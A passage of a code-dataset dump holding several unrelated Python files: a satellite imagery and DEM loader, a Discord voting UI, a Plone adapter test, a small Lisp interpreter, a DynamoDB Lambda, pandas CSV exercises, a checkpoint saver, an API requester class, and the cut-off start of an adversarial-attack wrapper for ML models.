order to calculate the average of DEM\n\n                with open(dirName + '.pkl', 'wb') as f: # then save it as .pkl\n                    pickle.dump(arr, f)\n                    f.close()\n\n        return DEM # <class 'numpy.ndarray'>\n\n    \"\"\" In the main program,\n    DEM.getDemdict('cols')\n    can be replaced by DEM.__dict__['cols']\n    \"\"\"\n    # def getDemdict(self, arg):\n    #     DEMdict = {\n    #         'cols' : self.DEMcols,\n    #         'rows' : self.DEMrows,\n    #         'xlucorner' : self.DEMxlucorner,\n    #         'ylucorner' : self.DEMylucorner,\n    #         'cellsize' : self.DEMcellsize,\n    #         'nodata_value' : self.DEMnodata_value,\n    #         'avg' : self.DEMavg\n    #     }\n    #     return DEMdict.get(arg, lambda: 'Invalid arguments')\n\n\nclass Tif:\n    def __init__(self, filePath):\n        # initialize\n        self.filePath = filePath\n        self.cols = 0.0\n        self.rows = 0.0\n        self.bands = 0.0\n        self.xlucorner = 0.0\n        self.ylucorner = 0.0\n        self.cellsize = 0.0\n        self.nodata_value = 0.0\n\n    def loadTif(self):\n        # Open the file:\n        (dirName, extension) = os.path.splitext(self.filePath)\n        tiff = gdal.Open(self.filePath) # type(tiff) gives <class 'osgeo.gdal.Dataset'>\n\n        # Dimensions\n        self.cols = tiff.RasterXSize # 7402\n        self.rows = tiff.RasterYSize # 6944\n        self.bands = tiff.RasterCount # Number of bands gives 4\n        self.xlucorner = tiff.GetGeoTransform()[0] # gives 195680.0\n        self.ylucorner = tiff.GetGeoTransform()[3] # gives 2695132.0\n        self.cellsize = tiff.GetGeoTransform()[1] # gives 4.0\n\n        # tiff to .pkl \n        while True:\n            try: # if .pkl exists\n                with open(dirName + '.pkl', 'rb') as f:\n                    Tif = pickle.load(f) # type(Tif) gives <class 'numpy.ndarray'>\n                    # plt.imshow(Tif)\n                    # plt.show()\n                    f.close()\n                    break\n\n            except IOError: # if not\n\n                b = tiff.GetRasterBand(1).ReadAsArray() # np.max(b) gives 16\n                g = tiff.GetRasterBand(2).ReadAsArray()\n                r = tiff.GetRasterBand(3).ReadAsArray()\n\n                # normalize color to 0~255 # b.dtype gives float64\n                b = (b / np.amax(b)) * 255\n                g = (g / np.amax(g)) * 255\n                r = (r / np.amax(r)) * 255\n\n                bgr = np.dstack((b, g, r))\n                bgr = bgr.astype(np.uint8) # float64 => uint8\n                bgr = simplest_cb(bgr) # color balance # bgr.shape gives (6944, 7402, 3)\n\n                rgb = bgr[:, :, ::-1] # cv2 reads images as BGR, while matplotlib expects RGB\n                # plt.imshow(rgb)\n                # plt.show()\n\n                with open(dirName + '.pkl', 'wb') as f: # save the RGB ndarray as .pkl\n                    pickle.dump(rgb, f)\n                    f.close()\n\n        return Tif # type(Tif) gives <class 'numpy.ndarray'> # rgb\n\n    \"\"\" In the main program,\n    Tif.getDemdict('cols')\n    can be replaced by Tif.__dict__['cols']\n    \"\"\"\n    # def getTifdict(self, arg):\n    #     Tifdict = {\n    #         'cols' : self.Tifcols,\n    #         'rows' : self.Tifrows,\n    #         'xlucorner' : self.Tifxlucorner,\n    #         'ylucorner' : self.Tifylucorner,\n    #         'cellsize' : self.Tifcellsize,\n    #         'band' : self.bands\n    #     }\n    #     return Tifdict.get(arg, lambda: 'Invalid arguments')\n\n\nclass Eph:\n    def __init__(self, filePath):\n        self.filePath = filePath\n\n    def loadEph(self): # load eph information in .dim\n        from coordinateSystem import CoordinateSystem\n        cs = CoordinateSystem()\n\n        meta_tree = ET.parse(self.filePath)\n        root = meta_tree.getroot()\n\n        ecef_List = []\n        eph = pd.DataFrame(columns=['time', 'Lat', 'Lon', 'sat_h', 'TM2_X', 'TM2_Y'])\n\n        # read position values of sat pos (in ecef) and time in .dim file then append to list\n        for points in root.findall('Data_Strip/Ephemeris/Corrected_Ephemeris/Point_List/'):\n            ecef_List.append([float(points.find('Location/X').text),\n                              float(points.find('Location/Y').text),\n                              float(points.find('Location/Z').text)])\n            eph = eph.append({'time': points.find('TIME').text}, ignore_index=True)\n\n        # coordinate transformation\n        for i in range(len(ecef_List)):\n            # ecef X Y Z to llh then save to dataframe eph\n            lat, lon, h = cs.ecef_to_llh(ecef_List[i])\n            eph.at[i, 'Lat'] = lat\n            eph.at[i, 'Lon'] = lon\n            eph.at[i, 'sat_h'] = h # ellipsoidal height (add the geoid undulation N and the LVD offset to get the satellite height in TWD97 coordinates)\n\n            # llh to TWD97 TM2 then save to dataframe eph\n            TM2_X, TM2_Y = cs.LatLon_To_TWD97TM2(lat, lon)\n            eph.at[i, 'TM2_X'] = TM2_X\n            eph.at[i, 'TM2_Y'] = TM2_Y\n\n        # read orientation values of sat pos (in ecef)\n        for idx, row in eph.iterrows():\n            for angle in root.findall('Data_Strip/Attitudes/Corrected_Attitudes/ECF_Attitude/Angle_List/'):\n                if angle.find('TIME').text == row['time']:\n\n                    R = float(angle.find('ROLL').text)\n                    P = float(angle.find('PITCH').text)\n                    Y = float(angle.find('YAW').text)\n                    rotRPY = rot(Y, 3).dot(rot(P, 2).dot(rot(R, 1))) # form rotation matrix\n\n                    # turn rotation matrix from ecef coordinate system to local TWD97 TM2\n                    Z = np.array(ecef_List[idx]) # position of s in ecef (X、Y、Z)\n                    unit_Z = Z / np.linalg.norm(Z) # unit Z vector\n\n                    satLat_rad, satLon_rad = radians(row['Lat']), radians(row['Lon'])\n                    X = np.array([- sin(satLon_rad), cos(satLon_rad), np.linalg.norm(Z) * sin(satLat_rad)])\n                    unit_X = X / np.linalg.norm(X)\n\n                    Y = np.cross(unit_Z, unit_X)\n                    unit_Y = Y / np.linalg.norm(Y)\n\n                    ecef_X = np.array([1, 0, 0])\n                    ecef_Y = np.array([0, 1, 0])\n                    ecef_Z = np.array([0, 0, 1])\n\n                    R = np.array([[unit_X.dot(ecef_X), unit_X.dot(ecef_Y), unit_X.dot(ecef_Z)],\n                                  [unit_Y.dot(ecef_X), unit_Y.dot(ecef_Y), unit_Y.dot(ecef_Z)],\n                                  [unit_Z.dot(ecef_X), unit_Z.dot(ecef_Y), unit_Z.dot(ecef_Z)]\n                                  ])\n\n                    rotOPK = np.transpose(R).dot(rotRPY)\n                    # then save all the elements to dataframe eph\n                    eph.at[idx, 'r11'] = rotOPK[0, 0]\n                    eph.at[idx, 'r12'] = rotOPK[0, 1]\n                    eph.at[idx, 'r13'] = rotOPK[0, 2]\n                    eph.at[idx, 'r21'] = rotOPK[1, 0]\n                    eph.at[idx, 'r22'] = rotOPK[1, 1]\n                    eph.at[idx, 'r23'] = rotOPK[1, 2]\n                    eph.at[idx, 'r31'] = rotOPK[2, 0]\n                    eph.at[idx, 'r32'] = rotOPK[2, 1]\n                    eph.at[idx, 'r33'] = rotOPK[2, 2]\n\n        return eph # type(eph) gives <class 'pandas.core.frame.DataFrame'>\n\n\nif __name__ == '__main__':\n    DEM = DEM('C:/Users/ChihYu/Desktop/ToNCKU_imagedata/台中.asc')\n    Tif = Tif('D:/shortcut/pleiades2017_ms_twd97-2.tif')\n    # 'D:/shortcut/FS5_G010_MS_L4TWD97_20191108_030233.tif'\n\n    Eph = Eph(\n        'C:/Users/ChihYu/Desktop/ToNCKU_imagedata/FS5_20191108/MS_L1A/FS5_G010_MS_L1A_20191108_030233'\n        '/FS5_G010_MS_L1A_20191108_030233.dim')\n\n    dem = DEM.loadDem()\n    tif = Tif.loadTif()\n    eph = Eph.loadEph()\n    # print(eph)\n","repo_name":"May7331/NSPO-Formosat-8","sub_path":"src/loadData.py","file_name":"loadData.py","file_ext":"py","file_size_in_byte":9766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24444744935","text":"# https://github.com/bijij/BotBot\n\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any\n\nimport discord\nfrom discord import Member as User\n\nfrom ..game import Player, VoteGameState\nfrom .input import InputUI\n\nif TYPE_CHECKING:\n    from .game import GameUI\n\n\n__all__ = (\"VoteUI\",)\n\n\ndef format_list(\n    string: str,\n    *ls: Any,\n    singular: str = \"has\",\n    plural: str = \"have\",\n    oxford_comma: bool = True,\n) -> str:\n    if not ls:\n        return string.format(\"no-one\", singular)\n    if len(ls) == 1:\n        return string.format(ls[0], singular)\n\n    *rest, last = ls\n    rest_str = \", \".join(str(item) for item in rest)\n    return string.format(rest_str + \",\" * oxford_comma + \" and \" + 
str(last), plural)\n\n\nclass VoteUI(InputUI):\n def __init__(self, game: GameUI, voters: list[Player[User]]) -> None:\n self.voters = voters\n super().__init__(game)\n\n @property\n def content(self) -> str:\n if not isinstance(self.game.game.state, VoteGameState):\n raise AssertionError\n return format_list(self.game.game.state.tooltip + \"\\nCurrently: {0} {1} voted.\", *self.votes)\n\n @property\n def votes(self) -> dict[Player[User], bool]:\n if isinstance(self.game.game.state, VoteGameState):\n return self.game.game.state.votes\n return {}\n\n async def interaction_check(self, interaction: discord.Interaction) -> bool:\n player = self.game.game.get_player(interaction.user)\n if player not in self.voters:\n await interaction.response.send_message(\"You cannot participate in this vote.\", ephemeral=True)\n return False\n if player in self.votes:\n await interaction.response.send_message(\"You have already voted.\", ephemeral=True)\n return False\n return True\n\n async def vote(self, interaction: discord.Interaction, vote: bool) -> None:\n await self.game.store_interaction(interaction)\n\n player = self.game.game.get_player(interaction.user)\n if player is None:\n msg = \"How?\"\n raise RuntimeError(msg)\n self.votes[player] = vote\n\n if self.game.game.state.ready:\n self.game.waiting.set()\n\n await interaction.message.edit(content=self.content, view=self)\n\n @discord.ui.button(label=\"ja!\", style=discord.ButtonStyle.danger)\n async def ja(self, item: discord.ui.Button, interation: discord.Interaction) -> None:\n return await self.vote(interation, True)\n\n @discord.ui.button(label=\"nein!\", style=discord.ButtonStyle.primary)\n async def nein(self, item: discord.ui.Button, interation: discord.Interaction) -> None:\n return await self.vote(interation, False)\n","repo_name":"rtk-rnjn/Parrot","sub_path":"interactions/buttons/secret_hitler/ui/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"77"} +{"seq_id":"43692041901","text":"from ftw.publisher.core.interfaces import IDataCollector\nfrom ftw.publisher.core.testing import ZCML_LAYER\nfrom ftw.testing import MockTestCase\nfrom Products.PloneFormGen.content.fields import HtmlTextField\nfrom Products.PloneFormGen.interfaces import IPloneFormGenField\nfrom zope.component import getAdapter\n\n\nclass TestPloneFormGenFGFieldAdapter(MockTestCase):\n\n layer = ZCML_LAYER\n\n def setUp(self):\n super(TestPloneFormGenFGFieldAdapter, self).setUp()\n\n self.obj = self.providing_stub(\n [IPloneFormGenField])\n self.obj.UID().return_value = 'some-uid'\n\n def test_component_registered_and_implements_interface(self):\n component = getAdapter(self.obj, IDataCollector,\n name='plone_form_gen_fg_field_adapter')\n\n self.assertTrue(\n IDataCollector.providedBy(component),\n 'PloneFormGen field adapter is not registered properly')\n\n def test_getData(self):\n field = HtmlTextField()\n field.default = \"
some html
\"\n\n self.obj.fgField = field\n component = getAdapter(self.obj, IDataCollector,\n name='plone_form_gen_fg_field_adapter')\n\n self.assertEquals(\n {'fgField': '
some html
'},\n component.getData())\n\n def test_setData(self):\n field = HtmlTextField()\n field.default = \"
some html
\"\n\n self.obj.fgField.side_effect = field\n component = getAdapter(self.obj, IDataCollector,\n name='plone_form_gen_fg_field_adapter')\n\n component.setData({'fgField': '
new html
'}, {})\n\n self.assertEquals('
new html
', self.obj.fgField.default)\n","repo_name":"4teamwork/ftw.publisher.core","sub_path":"ftw/publisher/core/tests/test_plone_form_gen_fg_field_adapter.py","file_name":"test_plone_form_gen_fg_field_adapter.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"30376302534","text":"# Laryssa Revelli\r\n# A01979841\r\nfrom random import random, randint\r\nimport os\r\nPATH = \"C:/Users/lreesa/cs4700/Assn10/\"\r\nif not os.path.exists(PATH):\r\n os.makedirs(PATH)\r\n\r\nIndex = 0\r\nBindings = {}\r\nReservedWords = ['+', '-', '*', '/', 'if', 'and', 'or', 'not', '>', 'eq', 'def', 'set', 'True', 'False']\r\nOperatorsAll = ['+', '-', '*', '/', 'if', 'and', 'or', 'not', '>', 'eq', 'set', 'def']\r\nOperatorsBoolBool = ['and', 'or', 'not', 'eq']\r\nOperatorsBoolNumb = ['>', 'eq']\r\nOperatorsNumb = ['+', '-', '*', '/']\r\nOperatorsDeclaritive = ['set', 'def']\r\nNumberOfArguments = {}\r\nArgumentCount = [(1, ['not']),(2, ['+', '-', '*', '/', '>', 'and', 'or', 'eq', 'set']), (3, ['if', 'def'])]\r\n# # fill the mapping from operator to argument count\r\nfor (count, operators) in ArgumentCount:\r\n for op in operators:\r\n NumberOfArguments[op] = count\r\n\r\ndef atom(token): \r\n # changes a token to an actual integer or boolean\r\n if token.isdigit():\r\n return int(token)\r\n if token == 'True' :\r\n return bool(token)\r\n if token == 'False':\r\n return not bool(token)\r\n return token\r\n\r\n### takes a program string and returns a parse tree\r\ndef parse(programStr):\r\n # returns the input string as a parse tree, represented as either an int or a list of expressions\r\n return createParseTree(tokenize(programStr))\r\n \r\n### does error checking\r\ndef parseX(programStr):\r\n # returns the input string as a parse tree, represented as either an int or a list of expressions\r\n return createParseTreeX(tokenize(programStr))\r\n\r\ndef createParseTree(tokenList):\r\n token = tokenList.pop(0)\r\n if isinstance(token, int) or isinstance(token, bool):\r\n return token\r\n operator = tokenList.pop(0) \r\n parseTree = [operator]\r\n for i in range(NumberOfArguments[operator]):\r\n parseTree += [createParseTree(tokenList)]\r\n tokenList.pop(0) # pop the ')'\r\n return parseTree\r\n \r\ndef createParseTreeX(tokenList):\r\n if tokenList == []:\r\n raise Exception(\"Run out of tokens\")\r\n token = tokenList.pop(0)\r\n if isinstance(token, int) or isinstance(token, bool):\r\n return tokenList\r\n if not token == \"(\":\r\n raise Exception(\"Found %s instead of (\" % (token,))\r\n if tokenList == []:\r\n raise Exception(\"Missing Operator\")\r\n operator = tokenList.pop(0) \r\n if not operator in OperatorsAll:\r\n raise Exception(\"Unknown operator %s\" % operator)\r\n parseTree = [operator]\r\n for i in range(NumberOfArguments[operator]):\r\n parseTree += [createParseTree(tokenList)]\r\n if tokenList == []:\r\n raise Exception(\"Missing )\")\r\n close = tokenList.pop(0) # pop the ')'\r\n if not ')' == close: # pop the ')'\r\n raise Exception(\"Found %s instead of )\" % (close,))\r\n return parseTree\r\n\r\n### takes a program string and evaluates\r\ndef evalL(programStr):\r\n # returns the solution of expressions\r\n try:\r\n return evaluate(createParseTree(tokenize(programStr)))\r\n except Exception as error:\r\n print(error)\r\n\r\ndef evaluate(parseTree):\r\n if isinstance(parseTree, int):\r\n return parseTree\r\n if isinstance(parseTree, bool):\r\n return parseTree\r\n if parseTree in Bindings: #vars\r\n 
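        # name lookup: return the value bound by (set ...) or the (args, body) pair stored by (def ...)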
return Bindings[parseTree]\r\n    operator = parseTree[0]\r\n    if operator == '+':\r\n        return evaluate(parseTree[1]) + evaluate(parseTree[2])\r\n    if operator == '-':\r\n        return evaluate(parseTree[1]) - evaluate(parseTree[2])\r\n    if operator == '*':\r\n        return evaluate(parseTree[1]) * evaluate(parseTree[2])\r\n    if operator == '/':\r\n        divisor = evaluate(parseTree[2])\r\n        if divisor == 0:\r\n            raise Exception('Cannot divide by 0')\r\n        else:\r\n            return evaluate(parseTree[1]) / divisor\r\n    if operator == 'not':\r\n        return not evaluate(parseTree[1])\r\n    if operator == 'and':\r\n        return evaluate(parseTree[1]) and evaluate(parseTree[2])\r\n    if operator == 'or':\r\n        return evaluate(parseTree[1]) or evaluate(parseTree[2])\r\n    if operator == '>':\r\n        return evaluate(parseTree[1]) > evaluate(parseTree[2])\r\n    if operator == 'eq':\r\n        return evaluate(parseTree[1]) == evaluate(parseTree[2])\r\n    if operator == 'if':\r\n        if evaluate(parseTree[1]):\r\n            return evaluate(parseTree[2])\r\n        else:\r\n            return evaluate(parseTree[3])\r\n    if operator == 'set':\r\n        Bindings[parseTree[1]] = evaluate(parseTree[2])\r\n    if operator == 'def':\r\n        Bindings[parseTree[1]] = parseTree[2:]\r\n    if operator in Bindings:\r\n        (args, body) = Bindings[operator]\r\n        for i in range(len(args)):\r\n            Bindings[args[i]] = evaluate(parseTree[i+1])\r\n        for j in range(len(body)-1):\r\n            evalL(body[j])\r\n        return evalL(body[-1])\r\n\r\ndef quote(parseTree):\r\n    return parseTree\r\n\r\n    \r\n### very simple code that just checks whether the number of open parentheses\r\n### is the same as the number of closed parentheses\r\ndef checkBalanced(tokenList):\r\n    depth = 0\r\n    while not tokenList == []:\r\n        token = tokenList.pop(0)\r\n        if token == '(': #consume and add 1 to depth\r\n            depth = depth + 1\r\n        if token == ')':\r\n            depth = depth - 1\r\n    return depth == 0\r\n    \r\n### takes a string representing an expression in simple lisp and returns a list of tokens\r\ndef tokenize(programStr):\r\n    tokens = programStr.replace('(', ' ( ').replace(')', ' ) ').split()\r\n    if all(legalToken(token) for token in tokens):\r\n        return [atom(token) for token in tokens]\r\n    else:\r\n        badTokens = str([token for token in tokens if not legalToken(token)])[1:][:-1]\r\n        raise Exception(\"Unknown token found %s\" % (badTokens,))\r\n    \r\n### returns True if the token is legal \r\ndef legalToken(token):\r\n    # returns True if legal for our simple lisp\r\n    return (token.isdigit() or token == 'True' or token == 'False'\r\n            or token in OperatorsAll + [')', '(']\r\n            or isinstance(token, str)) #vars\r\n\r\nevalL('(set var 7)')\r\nprint(Bindings['var'])","repo_name":"lreesa/cs4700-Programming-languages","sub_path":"Assn10/eLInterpreter.py","file_name":"eLInterpreter.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28786388684","text":"import boto3\nimport json\nimport decimal\n\ndynamodb = boto3.resource('dynamodb')\n\nclass CustomEncoder(json.JSONEncoder):\n    def default(self, o):\n        if isinstance(o, set):\n            return list(o)\n        if isinstance(o, decimal.Decimal):\n            if o % 1 > 0:\n                return float(o)\n            else:\n                return int(o)\n        return super(CustomEncoder, self).default(o)\n\ndef lambda_handler(event, context):\n    table = dynamodb.Table('Jobs')\n    response = table.scan()\n    jsonString = json.dumps(response['Items'], cls=CustomEncoder)\n    itemsObject = json.loads(jsonString)\n\n    result = {}\n    items = []\n\n    for item in itemsObject:\n        lowerCaseDict = {k.lower(): v for k, v in item.items()}\n        
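        # normalize DynamoDB attribute names to lowercase before returning them to the API client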
items.append(lowerCaseDict)\n\n \n result['items'] = sorted(items, key=lambda x : x['id'])\n\n return result","repo_name":"mikeacosta/task-abstract","sub_path":"src/GetJobs.py","file_name":"GetJobs.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"47915532823","text":"import random\r\nfrom Matrix import GuestPair\r\n\r\nparents = []\r\noffsprings = []\r\n\r\noptimal = []\r\n\r\ndef initialization(guest, table):\r\n print(\"====INITIALIZATION====\\nRandom seating assignments\")\r\n for t in range(0,len(table)):\r\n print(\"Table %s:\" %(table[t].displayNumber()))\r\n for i in range(0,5):\r\n try:\r\n g = random.choice(guest)\r\n print(\"==Chair %d: %s \" % (i + 1, g.displayName()))\r\n table[t].assignSeat(g.displayName())\r\n guest.remove(g)\r\n except:\r\n pass\r\n\r\ndef evaluation(table, next, keys):\r\n try:\r\n print(\"\\n\\n====EVALUATION====\")\r\n for t in range(0, len(table)):\r\n print(\"Table\",(t+1),\"(\"+str(table[t].generation)+\")\")\r\n for i in range(0, len(table[t].chairs)-1):\r\n for j in range(next, len(table[t].chairs)):\r\n print(\"-> \",table[t].chairs[i],\"-\",table[t].chairs[j],\" = \",GuestPair.getPoints(table[t].chairs[i],table[t].chairs[j]))\r\n keys+=str(GuestPair.getPoints(table[t].chairs[i], table[t].chairs[j]))\r\n next+=1\r\n next = 1\r\n calculateFitness(keys,0,0,[],0)\r\n keys = \"\"\r\n except:\r\n pass\r\n\r\ndef crossover(table,i):\r\n try:\r\n print(\"\\n\\n====CROSSOVER====\")\r\n while i < len(table):\r\n print(\"-> selected parents:\",table[i].chairs, table[i+1].chairs)\r\n offSpring1 = table[i].chairs[:int(len(table[i].chairs)/2)+1] + table[i+1].chairs[int(len(table[i].chairs)/2)+1:]\r\n offSpring2 = table[i].chairs[int(len(table[i].chairs) / 2)+1:] + table[i+1].chairs[:int(len(table[i].chairs)/2)+1]\r\n table[i].setOffSpring(offSpring1)\r\n table[i+1].setOffSpring(offSpring2)\r\n print(\"= produced offspring\",offSpring1,offSpring2)\r\n i+=2\r\n evaluation(table,1,\"\")\r\n except:\r\n pass\r\n\r\n\r\ndef calculateFitness(keys, i, s, temp, final):\r\n try:\r\n if (len(keys) % 2 == 1):\r\n keys += \"0\"\r\n while i < len(keys):\r\n temp.append(int(keys[i]) + int(keys[i + 1]))\r\n i += 2\r\n\r\n print(temp, keys)\r\n final += int(temp[0])\r\n for j in range(1, len(temp)):\r\n if (s == 0):\r\n final -= int(temp[j])\r\n s = 1\r\n else:\r\n final += int(temp[j])\r\n s = 0\r\n print(str(final))\r\n except Exception as e:\r\n print(e)\r\n\r\ndef shuffled(x):\r\n y = x[:]\r\n random.shuffle(y)\r\n return y\r\n\r\n","repo_name":"ThesisGeneticOptimizer/TGO","sub_path":"gen_al/GeneticAlgorithm.py","file_name":"GeneticAlgorithm.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43526367423","text":"# 1. Simply read the data from the file\n# with open(\"weather_data.csv\", \"r\") as f:\n# data = f.readlines()\n# for i in range(0, len(data)):\n# data[i] = data[i][:-1]\n# print(data)\n\n# 2. Read the data using the CSV library and recover the temperatures\n# import csv\n# with open(\"weather_data.csv\", \"r\") as f:\n# data = csv.reader(f)\n# temperatures = []\n# next(data, None)\n# for row in data:\n# temperatures.append(int(row[1]))\n# print(temperatures)\n\n# 3. Same but using Pandas library\n# import pandas\n# data = pandas.read_csv(\"weather_data.csv\")\n# print(data[\"temp\"])\n\n# 4. 
Calculate the average of the temperatures\n# import pandas\n# data = pandas.read_csv(\"weather_data.csv\")\n# # temperatures = data[\"temp\"].to_list()\n# # print(round(sum(temperatures) / len(temperatures), 1))\n# print(data[\"temp\"].mean())\n\n# 5. Print the row where the temperature was at the maximum\n# import pandas\n# data = pandas.read_csv(\"weather_data.csv\")\n# print(data[data.temp == data.temp.max()])\n\n# 6. Get Monday's temperature in Fahrenheit\n# import pandas\n# data = pandas.read_csv(\"weather_data.csv\")\n# data = data[data.day == \"Monday\"]\n# temperature = data.temp * 1.8 + 32\n# print(str(temperature[0])+\"°F\")\n\n# 7. From the squirrel_data_full.csv, create a new DataFrame containing\n# the count of squirrel sorted by data fur type and make it a CSV.\nimport pandas\ndata = pandas.read_csv(\"squirrel_data_full.csv\")\nfurs = data[\"Primary Fur Color\"].to_list()\n\ncolour_list = []\nfor item in furs:\n if item not in colour_list:\n colour_list.append(item)\ncolour_list = colour_list[1:]\n\ncolour_count = [0] * len(colour_list)\nfor item in furs:\n for colour in colour_list:\n if colour == item:\n colour_count[colour_list.index(colour)] += 1\n\nprocessed_data = {\"Fur Color\": colour_list, \"Count\": colour_count}\nprocessed_data = pandas.DataFrame(processed_data)\nprocessed_data.to_csv(\"squirrel_data.csv\")\n","repo_name":"ypasquazzo/100DaysOfCode","sub_path":"Day 25/CSV/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20679651414","text":"import torch\nimport os\n\ndef save_checkpoints(save_dir, mode, model_name, ema, epoch, optimizer, best_MIou, epoch_mpa, classes_miou, epoch_fwiou, epoch_mp, epoch_pa):\n \n filename = os.path.join(save_dir + mode + '/', 'Epoch::{}:: | Model: {} MIoU: {:.3f} | MPA: {:3f}.pth'.format(epoch, model_name, best_MIou, epoch_mpa))\n \n torch.save({\n 'epoch': epoch + 1,\n 'state_dict': ema.model.state_dict(),\n 'shadow': ema.shadow, \n 'optimizer': optimizer.state_dict(),\n 'best_MIou': best_MIou,\n 'epoch_mpa': epoch_mpa,\n 'epoch_classes_miou': classes_miou,\n 'epoch_fwiou': epoch_fwiou,\n 'epoch_mp': epoch_mp,\n 'epoch_pa': epoch_pa,\n 'best_MIou': best_MIou\n }, filename)","repo_name":"jonychoi/ETRI_Segmentation","sub_path":"utils/save_checkpoints.py","file_name":"save_checkpoints.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"929932278","text":"import datetime\nfrom django.shortcuts import render\nfrom django.views import View\nfrom blog.models import BlogCategory , Blog\nfrom product.models import ProductCategory\nfrom django.contrib.auth.models import User\n\nfrom user_profile.models import UserProfile\n\n\n# Create your views here.\nclass Blogs(View):\n \n def get(self, request,blog_id=None):\n \n navigationProductCategory = ProductCategory.objects.filter(status=True)\n blogcategory = BlogCategory.objects.filter(status=True)\n blog = Blog.objects.all()\n recent_news = Blog.objects.filter(date=datetime.datetime.now()).exclude(id = blog_id)\n context ={\n 'navigationProductCategory':navigationProductCategory,\n 'blogcategory':blogcategory,\n 'blogs':blog,\n 'recent_news':recent_news,\n }\n return render(request,\"blog.html\",context)\n\n\nclass blogdetails(View):\n def get(self, request,blog_id):\n \n print(blog_id)\n \n \n navigationProductCategory = 
ProductCategory.objects.filter(status=True)\n blogcategory = BlogCategory.objects.filter(status=True)\n blog = Blog.objects.filter(id = blog_id)\n admininfo = User.objects.filter(id=1)\n userprofile = UserProfile.objects.filter(id=3)\n recent_news = Blog.objects.filter(date=datetime.datetime.now()).exclude(id = blog_id)\n \n context ={\n 'navigationProductCategory':navigationProductCategory,\n 'blogcategory':blogcategory,\n 'blogs':blog,\n 'admininfo':admininfo,\n 'userprofile':userprofile,\n 'recent_news':recent_news,\n # 'recent_news':list(recent_news.values()),\n # 'userprofiles':list(userprofile.values()),\n # 'admininfo':list(admininfo.values()),\n }\n return render(request,\"blogdetails.html\",context)\n","repo_name":"mohitkhokale/Ecom_site","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27786690527","text":"import logging\nimport os\n\nimport requests\nfrom app.errors.utils import get_error_message\nfrom fastapi import HTTPException\n\nlogger = logging.getLogger(__name__)\n\n\nclass Requester:\n AUTH_SERVER_API_KEY = os.environ[\"AUTH_SERVER_API_KEY\"]\n POST_SERVER_API_KEY = os.environ[\"POST_SERVER_API_KEY\"]\n USER_SERVER_API_KEY = os.environ[\"USER_SERVER_API_KEY\"]\n PAYMENT_API_KEY = os.environ[\"PAYMENT_API_KEY\"]\n\n POST_API_URL = os.environ[\"POSTSERVER_URL\"]\n AUTH_API_URL = os.environ[\"AUTHSERVER_URL\"]\n USER_API_URL = os.environ[\"USERSERVER_URL\"]\n PAYMENT_API_URL = os.environ[\"PAYMENT_URL\"]\n\n @classmethod\n def room_srv_fetch(\n cls, method, path, expected_statuses, payload=None, extra_headers=None\n ):\n header = {\"api-key\": cls.POST_SERVER_API_KEY}\n\n if extra_headers is not None:\n header.update(extra_headers)\n\n if payload is None:\n payload = {}\n\n url = cls.POST_API_URL + path\n\n return cls._fetch(method, url, header, payload, expected_statuses)\n\n @classmethod\n def auth_srv_fetch(\n cls, method, path, expected_statuses, payload=None, extra_headers=None\n ):\n header = {\"api-key\": cls.AUTH_SERVER_API_KEY}\n print(f\"La api key del post server es: {header}\")\n\n if extra_headers is not None:\n header.update(extra_headers)\n\n if payload is None:\n payload = {}\n\n url = cls.AUTH_API_URL + path\n\n return cls._fetch(method, url, header, payload, expected_statuses)\n\n @classmethod\n def user_srv_fetch(\n cls, method, path, expected_statuses, payload=None, extra_headers=None\n ):\n header = {\"api-key\": cls.USER_SERVER_API_KEY}\n\n if extra_headers is not None:\n header.update(extra_headers)\n\n if payload is None:\n payload = {}\n\n url = cls.USER_API_URL + path\n print(\n f\"La url de user es: {url}, la env var resulto: \\\n {os.environ['USERSERVER_URL']}\"\n )\n\n return cls._fetch(method, url, header, payload, expected_statuses)\n\n @classmethod\n def payment_fetch(\n cls, method, path, expected_statuses, payload=None, extra_headers=None\n ):\n header = {\"api-key\": cls.PAYMENT_API_KEY}\n\n if extra_headers is not None:\n header.update(extra_headers)\n\n if payload is None:\n payload = {}\n\n url = cls.PAYMENT_API_URL + path\n\n return cls._fetch(method, url, header, payload, expected_statuses)\n\n @classmethod\n def _fetch(cls, method, url, headers, payload, expected_statuses):\n logger.info(\"Sending method %s to url: %s\", method, url)\n logger.debug(\"Header: %s, payload %s\", headers, payload)\n\n response = requests.request(method, url, json=payload, headers=headers)\n response_code 
= response.status_code\n        if response_code not in expected_statuses:\n            raise HTTPException(\n                status_code=response_code, detail=get_error_message(response)\n            )\n\n        return response.json(), response.status_code\n","repo_name":"bookbnb-G7/bookbnb-appserver","sub_path":"appserver/app/services/requester.py","file_name":"requester.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41192781664","text":"import torch\nimport torch.nn as nn\nfrom tqdm import tqdm\n\n\nclass AttackWrapper:\n    def __init__(self, model, attack_lr=1e-3, attack_iter=500,\n                 benign_ratio=0.8, benign_weight=0.2, clip_grad=10):\n        self.model = model\n        self.model.eval()\n        self.attack_lr = attack_lr\n        self.attack_iter = attack_iter\n        self.benign_ratio = benign_ratio\n        self.benign_weight = benign_weight\n        self.clip_grad = clip_grad\n        